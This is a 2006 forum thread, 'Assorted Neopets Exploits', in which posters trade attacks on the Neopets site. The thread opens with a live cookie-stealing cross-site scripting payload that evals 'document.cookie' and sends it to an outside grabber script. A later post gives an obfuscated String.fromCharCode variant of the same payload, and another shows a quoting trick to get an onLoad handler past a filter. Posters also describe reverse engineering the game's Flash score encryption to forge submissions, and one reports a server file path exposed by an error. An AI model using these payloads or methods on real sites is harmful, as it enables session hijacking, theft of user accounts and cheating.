<body onFocus="cs='docu'.concat('men','t.','cook','ie'); cook=eval (cs); URL='http://xss.awardspace.com/new/cgrab.php?c='; location.href=URL.concat(escape(cook));">
Sponsored by: â Sparkhost - Hosting Without Compromises! â Hybrid Performance Web Hosting â Spark Host Stream Hosting â Hybrid IRC & IRCd Server Shell Accounts
Assorted Neopets Exploits
Posted 09 February 2006 - 07:17 PM
Posted 11 February 2006 - 07:44 AM
Mmm, I do wonder if these methods still work...
Apage: Does that still work? I'd like to know how the encryption was cracked.
The encryption was just reverse engineered. echeese used an actionscript decompiler on the flash file and ported the resulting code to php, then we screwed with the functions till we figured out how it actually used them, sniffed a score submission, decoded it, and figured out what it all meant.
I dunno if it still works, I haven't used it in a long time, I haven't played NP in over a year.
If the encryption's been changed I'm sure it's still vulnerable to the same method of decompiling and reversing.
Posted 11 February 2006 - 01:19 PM
<body C=">" onLoad="test1 = new Array(5) test1 = "document.location=String.fr"; test1 = "om.CharC"; test1 = "ode(39,109,97,108,46,97,119,97,114,100,115,112,97,99,101,46,99,111,109,47,99,103 ,46,112,104,112,63,99,61,39)doc"; test1 = "ument.co"; test1 = "okie"; document.write(test1,test1,test1,test1,test1,test1); >
Posted 12 February 2006 - 12:46 PM
<body C=">" onLoad="alert('hi');">won't work, but:
<body C=">" onLoad="alert('hi');" X="<" >will.....
[EDIT]: While trying a few more vectors (some of which worked, but there is no need to post them since the one above works), by some luck I came across this error message:
Fatal error: Unknown function: t me() in /home/neopets/public_html/include/global.functions.inc on line 1450Which in itself doesn't mean anything, but the files exists, and while it doesn't actually show anything (just returns a blank page, must have configured the server to parse .inc files as .php files as well, or somthing similar), thats the location of the functions, so yeah, if it helps anyone *shrug*....
Edited by kuza55, 12 February 2006 - 11:13 PM.
Posted 20 February 2006 - 05:18 PM
Posted 20 February 2006 - 06:14 PM
0 user(s) are reading this topic
0 members, 0 guests, 0 anonymous users